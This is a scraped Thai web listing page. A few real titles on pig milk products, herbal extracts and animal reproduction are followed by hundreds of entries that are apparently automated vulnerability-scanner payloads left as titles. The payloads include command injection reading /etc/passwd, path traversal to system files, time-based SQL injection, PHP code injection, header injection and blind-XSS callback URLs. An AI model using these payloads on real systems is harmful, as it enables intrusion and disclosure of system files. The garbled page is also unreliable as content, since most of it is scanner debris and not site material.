1. การเลือกผลิตภัณฑ์นมโคสำหรับลูกสุกร download
 2. แนวทางของสารสกัดสมุนไพร download
 3. ทางเลือกใหม่เพื่อปรับปรุงระบบสืบพันธุ์(ตอนจบ)

  download
 4. 1download
 5. 1download
 6. 1download
 7. 1download
 8. 1download
 9. 1download
 10. 1download
 11. 1download
 12. 1download
 13. 1download
 14. 1download
 15. 1download
 16. response.write(9088527*9620206)download
 17. 1download
 18. 1download
 19. 1download
 20. 1download
 21. 1download
 22. '+response.write(9088527*9620206)+'download
 23. 1download
 24. 1download
 25. 1download
 26. 1download
 27. 1download
 28. "+response.write(9088527*9620206)+"download
 29. 1download
 30. 1download
 31. 1download
 32. 1download
 33. SomeCustomInjectedHeader:injected_by_wvsdownload
 34. response.write(9013114*9698470)download
 35. 1download
 36. ${99562+99155}download
 37. 1download
 38. SomeCustomInjectedHeader:injected_by_wvsdownload
 39. 1download
 40. '+response.write(9013114*9698470)+'download
 41. 1download
 42. ${100175+99870}download
 43. SomeCustomInjectedHeader:injected_by_wvsdownload
 44. 1download
 45. 1download
 46. 1download
 47. ${99905+100250}download
 48. SomeCustomInjectedHeader:injected_by_wvsdownload
 49. 1download
 50. 1download
 51. 1download
 52. 1download
 53. response.write(9294150*9363612)download
 54. 1download
 55. SomeCustomInjectedHeader:injected_by_wvsdownload
 56. 1download
 57. 1download
 58. '+response.write(9294150*9363612)+'download
 59. 1download
 60. SomeCustomInjectedHeader:injected_by_wvsdownload
 61. 1download
 62. 1download
 63. 1download
 64. 1download
 65. "+response.write(9294150*9363612)+"download
 66. 1download
 67. SomeCustomInjectedHeader:injected_by_wvsdownload
 68. 1download
 69. 1download
 70. 1download
 71. SomeCustomInjectedHeader:injected_by_wvsdownload
 72. 1download
 73. 1download
 74. 1download
 75. SomeCustomInjectedHeader:injected_by_wvsdownload
 76. download
 77. 1download
 78. &cat /etc/passwd&download
 79. 1download
 80. 1download
 81. '&cat /etc/passwd&'download
 82. 268435455download
 83. 1download
 84. 1download
 85. 1download
 86. 1download
 87. 1download
 88. 1download
 89. "&cat /etc/passwd&"download
 90. 1download
 91. ãhdownload
 92. 1download
 93. 1download
 94. 1download
 95. 1download
 96. 1download
 97. cat /etc/passwd download
 98. 1download
 99. 1download
 100. 1download
 101. ..À¯download
 102. 1download
 103. `cat /etc/passwd`download
 104. 1download
 105. 1download
 106. 1&n936012=v942334download
 107. 1download
 108. 1e309download
 109. |cat /etc/passwd#download
 110. 1download
 111. 1download
 112. 1download
 113. 1download
 114. 1download
 115. '"\'\");|]*{ <>¿''download
 116. '|'lddownload
 117. 1download
 118. 1download
 119. "|"lddownload
 120. http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpgdownload
 121. 1download
 122. 1download
 123. download
 124. 1some_inexistent_file_with_long_name%00.jpgdownload
 125. ;cat /etc/passwd;download
 126. 1download
 127. 1download
 128. 1download
 129. ../../../../../../../../../../etc/passwddownload
 130. 1download
 131. 1download
 132. ';cat /etc/passwd;'download
 133. 1download
 134. if(now()=sysdate(),sleep(9.968),0)/*'XOR(if(now()=sysdate(),sleep(9.968),0))OR'"XOR(if(now()=sysdate(),sleep(9.968),0))OR"*/download
 135. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgdownload
 136. http://testasp.vulnweb.com/t/fit.txt?%00.jpgdownload
 137. 1download
 138. ";cat /etc/passwd;"download
 139. 1download
 140. 1download
 141. testasp.vulnweb.comdownload
 142. download
 143. (select(0)from(select(sleep(9.968)))v)/*'+(select(0)from(select(sleep(9.968)))v)+'"+(select(0)from(select(sleep(9.968)))v)+"*/download
 144. ||cat /etc/passwddownload
 145. download
 146. ../../../../../../../../../../etc/passwd.jpgdownload
 147. 1download
 148. 1download
 149. http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpgdownload
 150. -1; waitfor delay '0:0:9.968' -- download
 151. &dirdownload
 152. Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5ndownload
 153. 1download
 154. '"()download
 155. 268435455download
 156. )download
 157. -1); waitfor delay '0:0:14.952' -- download
 158. '&dir&'download
 159. 1some_inexistent_file_with_long_name%00.jpgdownload
 160. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgdownload
 161. !(()&&!|*|*|download
 162. download
 163. -1)); waitfor delay '0:0:14.952' -- download
 164. ãhdownload
 165. "&dir&"download
 166. http://testasp.vulnweb.com/t/fit.txt?%00.jpgdownload
 167. ^(#$!@#$)(()))******download
 168. '"()download
 169. rgsNu7i7'; waitfor delay '0:0:14.952' -- download
 170. /../..//../..//../..//../..//../..//etc/passwd.jpgdownload
 171. ..À¯download
 172. )download
 173. testasp.vulnweb.comdownload
 174. download
 175. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwddownload
 176. |dirdownload
 177. 7dkBIHEs'); waitfor delay '0:0:14.952' -- download
 178. '"()download
 179. /etc/passwddownload
 180. !(()&&!|*|*|download
 181. http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpgdownload
 182. 1e309download
 183. '|dirdownload
 184. 1download
 185. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwddownload
 186. yWyxfySn')); waitfor delay '0:0:14.952' -- download
 187. ^(#$!@#$)(()))******download
 188. 1some_inexistent_file_with_long_name%00.jpgdownload
 189. "|dirdownload
 190. -1;select pg_sleep(14.952); -- download
 191. 1download
 192. '"\'\");|]*{ <>¿''download
 193. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwddownload
 194. -1);select pg_sleep(4.984); -- download
 195. )download
 196. http://testasp.vulnweb.com/t/fit.txt?%00.jpgdownload
 197. 1download
 198. -1));select pg_sleep(4.984); -- download
 199. ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯etc/passwddownload
 200. download
 201. &cat /etc/passwd&download
 202. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.download
 203. 1download
 204. !(()&&!|*|*|download
 205. t4N0hrC0';select pg_sleep(4.984); -- download
 206. 1download
 207. 1download
 208. file:///etc/passwddownload
 209. testasp.vulnweb.comdownload
 210. '&cat /etc/passwd&'download
 211. 1download
 212. download
 213. 1download
 214. ^(#$!@#$)(()))******download
 215. 1download
 216. /\../\../\../\../\../\../\../etc/passwddownload
 217. C5ibcKT8';select pg_sleep(9.968); -- download
 218. 268435455download
 219. http://testasp.vulnweb.com/t/xss.html?%00.jpgdownload
 220. 1download
 221. 1download
 222. "&cat /etc/passwd&"download
 223. WEB-INF/web.xmldownload
 224. 1download
 225. 1download
 226. ãhdownload
 227. http://testasp.vulnweb.com/t/xss.html?%00.jpgdownload
 228. cat /etc/passwd download
 229. 1download
 230. 9PHkOnGv';select pg_sleep(0); -- download
 231. 1download
 232. WEB-INF\web.xmldownload
 233. 1download
 234. 1download
 235. 1download
 236. ..À¯download
 237. http://testasp.vulnweb.com/t/xss.html?%00.jpgdownload
 238. ggTaJf1R');select pg_sleep(4.984); -- download
 239. `cat /etc/passwd`download
 240. ../../../../../../../../../../windows/win.inidownload
 241. OzakxATc');select pg_sleep(9.968); -- download
 242. 1download
 243. 1e309download
 244. 1download
 245. 1download
 246. 1download
 247. 1download
 248. 1download
 249. RE5TJSBN'));select pg_sleep(4.984); -- download
 250. |cat /etc/passwd#download
 251. '"\'\");|]*{ <>¿''download
 252. ../../../../../../../../../../boot.inidownload
 253. 1download
 254. 1download
 255. ;print(md5(acunetix_wvs_security_test));download
 256. 1download
 257. download
 258. 1download
 259. ../../../../../../../../../../windows/win.ini.jpgdownload
 260. '|'lddownload
 261. miOdR6gz'));select pg_sleep(14.952); -- download
 262. 1download
 263. 1download
 264. ';print(md5(acunetix_wvs_security_test));$a='download
 265. 1download
 266. À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯windowsÀ¯win.inidownload
 267. 1download
 268. "|"lddownload
 269. ";print(md5(acunetix_wvs_security_test));$a="download
 270. 1download
 271. 1download
 272. 1download
 273. 1download
 274. ${@print(md5(acunetix_wvs_security_test))}download
 275. ;cat /etc/passwd;download
 276. ................windowswin.inidownload
 277. 1download
 278. ';cat /etc/passwd;'download
 279. 1download
 280. 1download
 281. 1download
 282. ..\..\..\..\..\..\..\..\windows\win.inidownload
 283. ${@print(md5(acunetix_wvs_security_test))}\download
 284. ";cat /etc/passwd;"download
 285. 1download
 286. 1download
 287. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.inidownload
 288. 1download
 289. if(now()=sysdate(),sleep(16.141),0)/*'XOR(if(now()=sysdate(),sleep(16.141),0))OR'"XOR(if(now()=sysdate(),sleep(16.141),0))OR"*/download
 290. ||cat /etc/passwddownload
 291. ;print(md5(acunetix_wvs_security_test));download
 292. 1download
 293. 1download
 294. 1download
 295. ';print(md5(acunetix_wvs_security_test));$a='download
 296. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.inidownload
 297. 1download
 298. &dirdownload
 299. 1download
 300. (select(0)from(select(sleep(32.282)))v)/*'+(select(0)from(select(sleep(32.282)))v)+'"+(select(0)from(select(sleep(32.282)))v)+"*/download
 301. 1download
 302. 1download
 303. ";print(md5(acunetix_wvs_security_test));$a="download
 304. http://hitTjvpZx1NoL.bxss.me/download
 305. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.inidownload
 306. 1download
 307. '&dir&'download
 308. -1; waitfor delay '0:0:32.282' -- download
 309. ${@print(md5(acunetix_wvs_security_test))}download
 310. 1download
 311. ${@print(md5(acunetix_wvs_security_test))}\download
 312. 1¿''" class="download">download
 313. http://hitNbyl9cr1Fm.bxss.me/download
 314. "&dir&"download
 315. unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\download
 316. acunetix_wvs_invalid_filenamedownload
 317. -1); waitfor delay '0:0:32.282' -- download
 318. ;print(md5(acunetix_wvs_security_test));download
 319. research-add.phpdownload
 320. WEB-INF/web.xmldownload
 321. |dirdownload
 322. 1download
 323. http://hitoMxx97IBGR.bxss.me/download
 324. -1)); waitfor delay '0:0:32.282' -- download
 325. ';print(md5(acunetix_wvs_security_test));$a='download
 326. WEB-INF\web.xmldownload
 327. research-add.phpdownload
 328. '|dirdownload
 329. 1download
 330. ITrwmOBu'; waitfor delay '0:0:32.282' -- download
 331. 1download
 332. ";print(md5(acunetix_wvs_security_test));$a="download
 333. research-add.php/.download
 334. ../../../../../../../../../../etc/passwddownload
 335. 1download
 336. 1download
 337. 1download
 338. "|dirdownload
 339. 1download
 340. Ik8TKRNs'); waitfor delay '0:0:32.282' -- download
 341. ${@print(md5(acunetix_wvs_security_test))}download
 342. 1download
 343. 1download
 344. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgdownload
 345. 1download
 346. aZJ0Rg5s')); waitfor delay '0:0:48.422999999999995' -- download
 347. 1download
 348. &cat /etc/passwd&download
 349. 1download
 350. ${@print(md5(acunetix_wvs_security_test))}\download
 351. acunetix_wvs_invalid_filenamedownload
 352. ../../../../../../../../../../etc/passwd.jpgdownload
 353. -1;select pg_sleep(48.422999999999995); -- download
 354. '&cat /etc/passwd&'download
 355. 1download
 356. 1download
 357. research-add.phpdownload
 358. 1download
 359. Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5ndownload
 360. 1download
 361. -1);select pg_sleep(48.422999999999995); -- download
 362. research-add.phpdownload
 363. 1download
 364. "&cat /etc/passwd&"download
 365. 1download
 366. 1download
 367. -1));select pg_sleep(48.422999999999995); -- download
 368. research-add.php/.download
 369. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpgdownload
 370. 1download
 371. cat /etc/passwd download
 372. 1download
 373. 1download
 374. 1¿''" class="download">download
 375. s8VEuXCz';select pg_sleep(48.422999999999995); -- download
 376. 1download
 377. /../..//../..//../..//../..//../..//etc/passwd.jpgdownload
 378. 1download
 379. 1download
 380. `cat /etc/passwd`download
 381. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwddownload
 382. QPk7wo9D');select pg_sleep(48.422999999999995); -- download
 383. acunetix_wvs_invalid_filenamedownload
 384. 1download
 385. 1download
 386. |cat /etc/passwd#download
 387. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))download
 388. /etc/passwddownload
 389. 1download
 390. research-add.phpdownload
 391. lEuEzD5b'));select pg_sleep(16.141); -- download
 392. '|'lddownload
 393. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))download
 394. research-add.phpdownload
 395. 1download
 396. 1download
 397. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwddownload
 398. 1download
 399. 1download
 400. 1download
 401. research-add.php/.download
 402. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))download
 403. http://www.acunetix.tstdownload
 404. 1download
 405. 1'"download
 406. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwddownload
 407. "|"lddownload
 408. 1download
 409. 1download
 410. http://www.acunetix.tstdownload
 411. 1download
 412. 1download
 413. 1download
 414. ;cat /etc/passwd;download
 415. \download
 416. ..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯etc/passwddownload
 417. 1download
 418. 1download
 419. 1download
 420. http://www.acunetix.tstdownload
 421. if(now()=sysdate(),sleep(20.079),0)/*'XOR(if(now()=sysdate(),sleep(20.079),0))OR'"XOR(if(now()=sysdate(),sleep(20.079),0))OR"*/download
 422. ';cat /etc/passwd;'download
 423. 1download
 424. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.download
 425. 1download
 426. 1download
 427. ";cat /etc/passwd;"download
 428. 1download
 429. 1Axa7A¢download
 430. if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/download
 431. 1download
 432. 1download
 433. file:///etc/passwddownload
 434. @@ffTiRdownload
 435. 1download
 436. 1download
 437. 1download
 438. ||cat /etc/passwddownload
 439. (select(0)from(select(sleep(20.079)))v)/*'+(select(0)from(select(sleep(20.079)))v)+'"+(select(0)from(select(sleep(20.079)))v)+"*/download
 440. 1download
 441. 1download
 442. -1; waitfor delay '0:0:20.079' -- download
 443. 1download
 444. JyI=download
 445. 1download
 446. &dirdownload
 447. /\../\../\../\../\../\../\../etc/passwddownload
 448. 1download
 449. WEB-INF/web.xmldownload
 450. 1download
 451. -1); waitfor delay '0:0:20.079' -- download
 452. 1¿''" class="download">download
 453. ?'?"download
 454. '&dir&'download
 455. 1download
 456. WEB-INF\web.xmldownload
 457. 1download
 458. 1download
 459. -1)); waitfor delay '0:0:20.079' -- download
 460. 1download
 461. 1download
 462. ?''?""download
 463. "&dir&"download
 464. '"download
 465. FzIdPd8a'; waitfor delay '0:0:40.158' -- download
 466. 1download
 467. 1download